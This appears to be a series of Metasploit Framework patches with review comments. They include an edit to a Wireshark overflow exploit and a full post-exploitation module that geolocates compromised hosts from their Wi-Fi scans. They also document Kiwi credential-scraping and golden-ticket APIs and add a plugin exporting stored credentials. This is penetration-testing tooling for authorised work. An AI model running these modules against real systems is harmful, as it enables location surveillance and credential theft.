diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3034a0c0f1..3002bfe3e7 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode - packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) packet << make_nops(4) # nseh # \0xff is a badchar then we can't make a jump back with jmp $-2000 From 2fd004b69e0c731139f8ae3198c3ab4f9b932e53 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sat, 19 Apr 2014 17:31:48 -0500 Subject: [PATCH 128/853] New module: Multiplatform Wireless LAN Geolocation This is a new POST module that allows Windows, Linux, and OSX targets to be geolocated using Google services if the target has an active and functional wireless adapter. --- modules/post/multi/gather/wlan_geolocate.rb | 167 ++++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 modules/post/multi/gather/wlan_geolocate.rb diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb new file mode 100644 index 0000000000..b959960fbe --- /dev/null +++ b/modules/post/multi/gather/wlan_geolocate.rb 
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'json'
+require 'net/http'
+
+class Metasploit3 < Msf::Post
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Multiplatform Wireless LAN Geolocation',
+ 'Description' => %q{ Geolocate the target device by gathering local
+ wireless networks and performing a lookup against Google APIs.},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Tom Sellers fadedcode.net>'],
+ 'Platform' => %w{ osx win linux },
+ 'SessionTypes' => [ 'meterpreter', 'shell' ],
+ ))
+
+ end
+
+ def get_strength(quality)
+ # Convert the signal quality to signal strength (dbm) to be sent to
+ # Google. Docs indicate this should subtract 100 instead of the 95 I
+ # am using here, but in practice 95 seems to be closer.
+ signal_str = quality.to_i / 2
+ signal_str = (signal_str - 95).round
+ return signal_str
+
+ end
+
+ def parse_wireless_win(listing)
+ wlan_list = ''
+ raw_networks = listing.split("\r\n\r\n")
+
+ raw_networks.each { |network|
+ details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m)
+ if !details.nil?
+ strength = get_strength(details[3])
+ network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}"
+ wlan_list << network_data
+ end
+ }
+
+ return wlan_list
+ end
+
+
+ def parse_wireless_linux(listing)
+ wlan_list = ''
+ raw_networks = listing.split("Cell ")
+
+ raw_networks.each { |network|
+ details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m)
+ if !details.nil?
+ network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}"
+ wlan_list << network_data
+ end
+ }
+
+ return wlan_list
+ end
+
+ def parse_wireless_osx(listing)
+ wlan_list = ''
+ raw_networks = listing.split("\n")
+
+ raw_networks.each { |network|
+ network = network.strip
+ details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/)
+ if !details.nil?
+ network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}"
+ wlan_list << network_data
+ end
+ }
+
+ return wlan_list
+ end
+
+
+ # Run Method for when run command is issued
+ def run
+ if session.type =~ /shell/
+ # Use the shell platform for selecting the command
+ platform = session.platform
+ else
+ # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform
+ platform = session.sys.config.sysinfo['OS']
+ end
+
+
+ case platform
+ when /win/i
+
+ listing = cmd_exec('netsh wlan show networks mode=bssid')
+ if listing.nil?
+ print_error("Unable to generate wireless listing..")
+ return nil
+ else
+ store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+ wlan_list = parse_wireless_win(listing)
+ end
+
+ when /osx/i
+
+ listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
+ if listing.nil?
+ print_error("Unable to generate wireless listing..")
+ return nil
+ else
+ store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+ wlan_list = parse_wireless_osx(listing)
+ end
+
+ when /linux/i
+
+ listing = cmd_exec('iwlist scanning')
+ if listing.nil?
+ print_error("Unable to generate wireless listing..")
+ return nil
+ else
+ store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
+ wlan_list = parse_wireless_linux(listing)
+ end
+ else
+ print_error("The target's platform is not supported at this time.")
+ return nil
+ end
+
+ if wlan_list.nil? || wlan_list.empty?
+ print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
+ return
+ end
+
+
+ # Build and send the request to Google
+ url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
+ uri = URI.parse(URI.encode(url))
+ request = Net::HTTP::Get.new(uri.request_uri)
+ http = Net::HTTP::new(uri.host,uri.port)
+ http.use_ssl = true
+ response = http.request(request)
+
+ # Gather the required information from the response
+ if response && response.code == '200'
+ results = JSON.parse(response.body)
+ latitude = results["location"]["lat"]
+ longitude = results["location"]["lng"]
+ accuracy = results["accuracy"]
+ print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
+ print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}")
+ else
+ print_error("Failure connecting to Google for location lookup")
+ end
+
+
+ rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
+ rescue ::Exception => e
+ print_status("The following Error was encountered: #{e.class} #{e}")
+ end
+
+
+end
From 16349099759241506baa7ba72905c22d1ee99e19 Mon Sep 17 00:00:00 2001
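Review bot: The SSID text captured by the three `parse_wireless_*` methods comes from scan output the operator does not control, and it is interpolated into the query string unescaped; `URI.encode(url)` over the assembled URL in `run` leaves `&` and `=` as they are, so an SSID containing them changes the request that is sent. Encode each value where it is inserted, for example `ssid:#{Rex::Text.uri_encode(details[1].to_s)}`, instead of encoding the whole URL afterwards. The trailing `rescue ::Exception => e` also catches `Interrupt` and `SystemExit`, and the empty `rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError` clause hides session errors without a message; `rescue ::StandardError => e` with `print_error` would be narrower. `results["location"]["lat"]` raises when a 200 response carries no `location` key, so that key should be checked before the values are printed.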
From: Christian Mehlmauer Date: Sun, 20 Apr 2014 00:44:48 +0200 Subject: [PATCH 129/853] Bumped ruby version to newest 1.9.3 Otherwise this message is always displayed when entering the folder ruby-1.9.3-p484 is not installed. To install do: 'rvm install ruby-1.9.3-p484' And running up to date software is never a failure (even when 1.9.3 is no longer maintained) --- .ruby-version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.ruby-version b/.ruby-version index 7a895c2142..671d1fe46c 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p484 +1.9.3-p545 From fc803ae277cd3d4b95720d5abd8cc437af6de579 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sun, 20 Apr 2014 22:41:32 +0200 Subject: [PATCH 130/853] Changed msftidy check send_request_raw does not support vars_get so change the message to switch to send_request_cgi. See #3272 for more info --- tools/msftidy.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 07fb8e4463..b263d16f61 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -485,10 +485,18 @@ class Msftidy end def check_vars_get - test = @source.scan(/send_request_(?:cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im) + test = @source.scan(/(send_request_(cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+)/im) unless test.empty? test.each { |item| - warn("Please use vars_get in send_request_cgi and send_request_raw: #{item}") + case item[1] + when 'cgi' + warn("Please use vars_get in send_request_cgi: #{item[0]}") + when 'raw' + # send_request_raw does not support vars_getiirb + warn("Please use vars_get and switch to send_request_cgi: #{item[0]}") + else + raise('Error in regex') + end } end end From 49bd86f07743169c9bd628850df870d5056dc8b9 Mon Sep 17 00:00:00 2001 
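Review bot: The regex in `check_vars_get` keeps the `i` flag, so the new capture group can return `CGI` or `Raw`, which matches neither `when 'cgi'` nor `when 'raw'` and falls through to `raise('Error in regex')`, aborting the whole tidy run on one oddly cased line. Switching on `case item[1].downcase` keeps those inputs on the warning path. The added comment also carries stray characters and should read `# send_request_raw does not support vars_get`.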
From: James Lee Date: Mon, 21 Apr 2014 03:12:23 -0500 Subject: [PATCH 131/853] Clean up yardocs and a few style issues --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 73 ++++++++----------- .../ui/console/command_dispatcher/kiwi.rb | 24 +++--- lib/rex/text.rb | 11 ++- 3 files changed, 52 insertions(+), 56 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 6f9b6d4282..3a7eeb7d86 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -39,7 +39,7 @@ class Kiwi < Extension # dumped kerberos tickets. The order of these is important. Each # of them was pulled from the Mimikatz 2.0 source base. # - @@kerberos_flags = [ + KERBEROS_FLAGS = [ "NAME CANONICALIZE", "", "OK AS DELEGATE", @@ -56,11 +56,12 @@ class Kiwi < Extension "FORWARDED", "FORWARDABLE", "RESERVED" - ] + ].map(&:freeze).freeze # # Typical extension initialization routine. # + # @param client (see Extension#initialize) def initialize(client) super(client, 'kiwi') @@ -76,8 +77,7 @@ class Kiwi < Extension # # Dump the LSA secrets from the target machine. # - # Returns [Hash] - # + # @return [Hash] def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -129,17 +129,15 @@ class Kiwi < Extension # Convert a flag set to a list of string representations for the bit flags # that are set. # - # @param flags [Integer] - Integer bitmask of Kerberos token flags. - # - # Returns [String] + # @param flags [Fixnum] Integer bitmask of Kerberos token flags. # + # @return [Array] Names of all set flags in +flags+. See + # {KERBEROS_FLAGS} def to_kerberos_flag_list(flags) flags = flags >> 16 results = [] - @@kerberos_flags.each_with_index do |item, idx| - mask = 1 << idx - + KERBEROS_FLAGS.each_with_index do |item, idx| if (flags & (1 << idx)) != 0 results << item end 
@@ -151,9 +149,9 @@ class Kiwi < Extension # # List available kerberos tickets. # - # @param export [Bool] - Set to +true+ to export the content of each ticket + # @param export [Bool] Set to +true+ to export the content of each ticket # - # Returns [Array[Hash]] + # @return [Array] # def kerberos_ticket_list(export) export ||= false @@ -184,9 +182,9 @@ class Kiwi < Extension # # Use the given ticket in the current session. # - # @param icket [Array[Byte]] - Content of the Kerberos ticket to use. + # @param ticket [String] Content of the Kerberos ticket to use. # - # Returns [Bool] + # @return [void] # def kerberos_ticket_use(ticket) request = Packet.create_request('kiwi_kerberos_ticket_use') @@ -198,7 +196,7 @@ class Kiwi < Extension # # Purge any Kerberos tickets that have been added to the current session. # - # Returns [Bool] + # @return [void] # def kerberos_ticket_purge request = Packet.create_request('kiwi_kerberos_ticket_purge') @@ -209,14 +207,14 @@ class Kiwi < Extension # # Create a new golden kerberos ticket on the target machine and return it. # - # @param user [String] - Name of the user to create the ticket for. - # @param domain [String] - Domain name. - # @param sid [String] - SID of the domain. - # @param tgt [String] - The kerberos ticket granting token. - # @param id [Integer] - ID of the user to grant the token for. - # @param group_ids [Array[Integer]] - IDs of the groups to assign to the user + # @param user [String] Name of the user to create the ticket for. + # @param domain [String] Domain name. + # @param sid [String] SID of the domain. + # @param tgt [String] The kerberos ticket granting token. + # @param id [Fixnum] ID of the user to grant the token for. + # @param group_ids [Array] IDs of the groups to assign to the user # - # Returns [Array[Byte]] + # @return [String] # def golden_ticket_create(user, domain, sid, tgt, id = 0, group_ids = []) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') 
@@ -231,15 +229,14 @@ class Kiwi < Extension end response = client.send_request(request) -return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end # # List all the wifi interfaces and the profiles associated # with them. Also show the raw text passwords for each. # - # Returns [Array[Hash]] - # + # @return [Array] def wifi_list request = Packet.create_request('kiwi_wifi_profile_list') @@ -278,10 +275,9 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape passwords from the target machine. # - # @param pwd_id - ID of the type credential to scrape. - # - # Returns [Array[Hash]] + # @param pwd_id [Fixnum] ID of the type credential to scrape. # + # @return [Array] def scrape_passwords(pwd_id) request = Packet.create_request('kiwi_scrape_passwords') request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) @@ -306,8 +302,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape all passwords from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def all_pass scrape_passwords(PWD_ID_SEK_ALLPASS) end @@ -315,8 +310,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape wdigest credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def wdigest scrape_passwords(PWD_ID_SEK_WDIGEST) end @@ -324,8 +318,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape msv credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def msv scrape_passwords(PWD_ID_SEK_MSV) end @@ -333,8 +326,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape LiveSSP credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def livessp scrape_passwords(PWD_ID_SEK_LIVESSP) end 
@@ -342,8 +334,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape SSP credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def ssp scrape_passwords(PWD_ID_SEK_SSP) end @@ -351,8 +342,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape TSPKG credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def tspkg scrape_passwords(PWD_ID_SEK_TSPKG) end @@ -360,8 +350,7 @@ return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) # # Scrape Kerberos credentials from the target machine. # - # Returns [Array[Hash]] - # + # @return (see #scrape_passwords) def kerberos scrape_passwords(PWD_ID_SEK_KERBEROS) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 3502931aa2..be6500b771 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -433,10 +433,10 @@ class Console::CommandDispatcher::Kiwi protected def check_privs - unless system_check - print_warning("Not running as SYSTEM, execution may fail") - else + if system_check print_good("Running as SYSTEM") + else + print_warning("Not running as SYSTEM, execution may fail") end end 
@@ -452,11 +452,13 @@ protected # # Invoke the password scraping routine on the target. # - # +provider+ [String] - The name of the type of credentials to dump (used for - # display purposes only). - # +method+ [Block] - Block that contains a call to the method that invokes the - # appropriate function on the client that returns the results from Meterpreter. + # @param provider [String] The name of the type of credentials to dump + # (used for display purposes only). + # @param method [Proc] Block that calls the method that invokes the + # appropriate function on the client that returns the results from + # Meterpreter that lay in the house that Jack built. # + # @return [void] def scrape_passwords(provider, method) check_privs print_status("Retrieving #{provider} credentials") @@ -488,12 +490,14 @@ protected end # - # Helper function to convert a potentially blank value to hex and have the - # outer spaces stripped + # Helper function to convert a potentially blank value to hex and have + # the outer spaces stripped # + # @param (see Rex::Text.to_hex) + # @return [String] The result of {Rex::Text.to_hex}, strip'd def to_hex(value, sep = '') value ||= "" - Rex::Text::to_hex(value, sep).strip + Rex::Text.to_hex(value, sep).strip end end diff --git a/lib/rex/text.rb b/lib/rex/text.rb index c9e90f248c..56e0ceb791 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -1291,13 +1291,16 @@ module Text end # - # Convert an array of 16 bytes to a GUID string + # Convert 16-byte string to a GUID string # - # @param bytes [Array[Byte]] Array of 16 bytes which represent a GUID - # in the proper order. + # @example + # str = "ABCDEFGHIJKLMNOP" + # Rex::Text.to_guid(str) #=> "{44434241-4645-4847-494a-4b4c4d4e4f50}" # - # Returns [String]. + # @param bytes [String] 16 bytes which represent a GUID in the proper + # order. # + # @return [String] def self.to_guid(bytes) return nil unless bytes s = bytes.unpack('H*')[0] 
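Review bot: The new `@param method` text in the `scrape_passwords` yardoc ends with "that lay in the house that Jack built", which will appear verbatim in the generated API docs and says nothing about the parameter. I would trim it to `# @param method [Proc] Block that calls the client method returning the results from Meterpreter.` The parameter name `method` also shadows `Object#method` inside the body; that predates this commit, and most of the body lies outside the hunk.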
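Review bot: The new `@return [String]` on `Rex::Text.to_guid` does not cover the `return nil unless bytes` guard visible as the first line of the body, so a caller reading the docs will not expect nil. `# @return [String, nil] the GUID string, or nil when +bytes+ is nil` would match the code. The rest of the method body is outside the hunk.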
From 0b7a2b9ceff9f737708018cd8699639c1f951692 Mon Sep 17 00:00:00 2001 From: Trenton Ivey Date: Mon, 21 Apr 2014 11:03:52 -0500 Subject: [PATCH 132/853] Added plugin to provide formatted wiki output from the framework database --- plugins/wiki.rb | 575 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 575 insertions(+) create mode 100644 plugins/wiki.rb diff --git a/plugins/wiki.rb b/plugins/wiki.rb new file mode 100644 index 0000000000..9e8d31f5af --- /dev/null +++ b/plugins/wiki.rb 
@@ -0,0 +1,575 @@ +## +# +# This plugin requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +# +## + +module Msf + +### +# +# This plugin extends the Rex::Ui::Text::Table class and provides commands +# that output database information for the current workspace in a wiki +# friendly format +# +# @author Trenton Ivey +# * *email:* ("trenton.ivey@example.com").gsub(/example/,"gmail") +# * *github:* kn0 +# * *twitter:* trentonivey +### +class Plugin::Wiki < Msf::Plugin + + ### + # + # This class implements a command dispatcher that provides commands to + # output database information in a wiki friendly format. + # + ### + class WikiCommandDispatcher + include Msf::Ui::Console::CommandDispatcher + + # + # The dispatcher's name. + # + def name + "Wiki" + end + + # + # Returns the hash of commands supported by the wiki dispatcher. + # + def commands + { + "dokuwiki" => "Outputs data from the current workspace in dokuwiki markup.", + "mediawiki" => "Outputs data from the current workspace in mediawiki markup." 
+ } + end + + # + # Outputs database entries as Dokuwiki formatted text by passing the + # arguments to the wiki method with a wiki_type of 'dokuwiki' + # @param [Array] args the arguments passed when the command is + # called + # @see #wiki + # + def cmd_dokuwiki(*args) + wiki("dokuwiki", *args) + end + + # + # Outputs database entries as Mediawiki formatted text by passing the + # arguments to the wiki method with a wiki_type of 'mediawiki' + # @param [Array] args the arguments passed when the command is + # called + # @see #wiki + # + def cmd_mediawiki(*args) + wiki("mediawiki", *args) + end + + # + # This method parses arguments passed from the wiki output commands + # and then formats and displays or saves text according to the + # provided wiki type + # + # @param [String] wiki_type selects the wiki markup lanuguage output to + # use, it can be: + # * dokuwiki + # * mediawiki + # + # @param [Array] args the arguments passed when the command is + # called + # + def wiki(wiki_type, *args) + # Create a table options hash + tbl_opts = {} + # Set some default options for the table hash + tbl_opts[:hosts] = [] + tbl_opts[:links] = false + tbl_opts[:wiki_type] = wiki_type + tbl_opts[:heading_size] = 5 + case wiki_type + when "dokuwiki" + tbl_opts[:namespace] = 'notes:targets:hosts:' + else + tbl_opts[:namespace] = '' + end + + # Get the table we should be looking at + command = args.shift + if command.nil? or not ["creds","hosts","loot","services","vulns"].include? command.downcase + usage(wiki_type) + return + end + + # Parse the rest of the arguments + while (arg = args.shift) + case arg + when '-o','--output' + tbl_opts[:file_name] = next_opt(args) + when '-h','--help' + usage(wiki_type) + return + when '-l', '-L', '--link', '--links' + tbl_opts[:links] = true + when '-n', '-N', '--namespace' + tbl_opts[:namespace] = next_opt(args) + when '-p', '-P', '--port', '--ports' + tbl_opts[:ports] = next_opts(args) + tbl_opts[:ports].map! 
{|p| p.to_i} + when '-s', '-S', '--search' + tbl_opts[:search] = next_opt(args) + when '-i', '-I', '--heading-size' + heading_size = next_opt(args) + tbl_opts[:heading_size] = heading_size.to_i unless heading_size.nil? + else + # Assume it is a host + rw = Rex::Socket::RangeWalker.new(arg) + if rw.valid? + rw.each do |ip| + tbl_opts[:hosts] << ip + end + else + print_warning "#{arg} is an invalid hostname" + end + end + end + + # Create an Array to hold a list of tables that we want to show + outputs = [] + + # Output the table + if respond_to? "#{command}_to_table" + table = send "#{command}_to_table", tbl_opts + if table.respond_to? "to_#{wiki_type}" + if tbl_opts[:file_name] + print_status("Wrote the #{command} table to a file as a #{wiki_type} formatted table") + File.open(tbl_opts[:file_name],"wb") {|f| + f.write(table.send "to_#{wiki_type}") + } + else + print_line table.send "to_#{wiki_type}" + end + return + end + end + usage(wiki_type) + end + + # + # Gets the next set of arguments when parsing command options + # + # *Note:* This will modify the provided argument list + # + # @param [Array] args the list of unparsed arguments + # @return [Array] the unique list of items before the next '-' in the + # provided array + # + def next_opts(args) + opts = [] + while ( opt = args.shift ) + if opt =~ /^-/ + args.unshift opt + break + end + opts.concat ( opt.split(',') ) + end + return opts.uniq + end + + # + # Gets the next argument when parsing command options + # + # *Note:* This will modify the provided argument list + # + # @param [Array] args the list of unparsed arguments + # @return [String, nil] the argument or nil if the argument starts with a '-' + # + def next_opt(args) + return nil if args[0] =~ /^-/ + args.shift + end + + # + # Outputs the help message + # + # @param [String] cmd_name the type of the wiki output command to display + # help for + # + def usage(cmd_name = "") + print_line "Usage: #{cmd_name} [options] [IP1 IP2,IPn]" + print_line + 
print_line "The first argument must be the type of table to retrieve:" + print_line " creds, hosts, loot, services, vulns" + print_line + print_line "OPTIONS:" + print_line " -l,--link Enables links for host addresses" + print_line " -n,--namespace Changes the default namespace for host links" + print_line " -o,--output Write output to a file" + print_line " -p,--port Only return results that relate to given ports" + print_line " -s,--search Only show results that match the provided text" + print_line " -i,--heading-size <1-6> Changes the heading size" + print_line " -h,--help Displays this menu" + print_line + end + + # + # Outputs credentials in the database (within the current workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def creds_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','user','pass','type','proof','active?']}) + tbl.header = 'Credentials' + tbl.headeri = opts[:heading_size] + framework.db.creds.each do |cred| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? cred.service.host.address + end + unless opts[:ports].nil? + next unless opts[:ports].any? {|p| cred.service.port.eql? p} + end + address = cred.service.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + cred.service.port, + cred.user, + cred.pass, + cred.ptype, + cred.proof, + cred.active + ] + if opts[:search] + tbl << row if row.any? 
{|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs host information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def hosts_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['address','mac','name','os_name','os_flavor','os_sp','purpose','info','comments']}) + tbl.header = 'Hosts' + tbl.headeri = opts[:heading_size] + framework.db.hosts.each do |host| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? host.address + end + unless opts[:ports].nil? + next unless (host.services.map{|s| s[:port]}).any? {|p| opts[:ports].include? p} + end + address = host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + host.mac, + host.name, + host.os_name, + host.os_flavor, + host.os_sp, + host.purpose, + host.info, + host.comments + ] + if opts[:search] + tbl << row if row.any? 
{|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs loot information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def loot_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','service','type','name','content','info','path']}) + tbl.header = 'Loot' + tbl.headeri = opts[:heading_size] + framework.db.loots.each do |loot| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? loot.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next if loot.service.nil? or loot.service.port.nil? or not opts[:ports].include? loot.service.port + end + if loot.service + svc = (loot.service.name ? loot.service.name : "#{loot.service.port}/#{loot.service.proto}") + end + address = loot.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + svc || "", + loot.ltype, + loot.name, + loot.content_type, + loot.info, + loot.path + ] + if opts[:search] + tbl << row if row.any? 
{|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs service information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def services_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['host','port','proto','name','state','info']}) + tbl.header = 'Services' + tbl.headeri = opts[:heading_size] + framework.db.services.each do |service| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? service.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next unless opts[:ports].any? {|p| service[:port].eql? p} + end + address = service.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + address, + service.port, + service.proto, + service.name, + service.state, + service.info + ] + if opts[:search] + tbl << row if row.any? 
{|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Outputs vulnerability information stored in the database (within the current + # workspace) as a Rex table object + # @param [Hash] opts + # @option opts [Array] :hosts contains list of hosts used to limit results + # @option opts [Array] :ports contains list of ports used to limit results + # @option opts [String] :search limits results to those containing a provided string + # @return [Rex::Ui::Text::Table] table containing credentials + # + def vulns_to_table(opts = {}) + tbl = Rex::Ui::Text::Table.new({'Columns' => ['Title','Host','Port','Info','Detail Count','Attempt Count','Exploited At','Updated At']}) + tbl.header = 'Vulns' + tbl.headeri = opts[:heading_size] + framework.db.vulns.each do |vuln| + unless opts[:hosts].nil? or opts[:hosts].empty? + next unless opts[:hosts].include? vuln.host.address + end + unless opts[:ports].nil? or opts[:ports].empty? + next unless opts[:ports].any? {|p| vuln.service.port.eql? p} + end + address = vuln.host.address + address = to_wikilink(address,opts[:namespace]) if opts[:links] + row = [ + vuln.name, + address, + (vuln.service ? vuln.service.port : ""), + vuln.info, + vuln.vuln_detail_count, + vuln.vuln_attempt_count, + vuln.exploited_at, + vuln.updated_at, + ] + if opts[:search] + tbl << row if row.any? {|r| /#{opts[:search]}/i.match r.to_s} + else + tbl << row + end + end + return tbl + end + + # + # Converts a value to a wiki link + # @param [String] text value to convert to a link + # @param [String] namespace optional namespace to set for the link + # @return [String] the formated wiki link + def to_wikilink(text,namespace = "") + return "[[" + namespace + text + "]]" + end + + end + + + # + # Plugin Initialization + # + + + # + # Constructs a new instance of the plugin and registers the console + # dispatcher. 
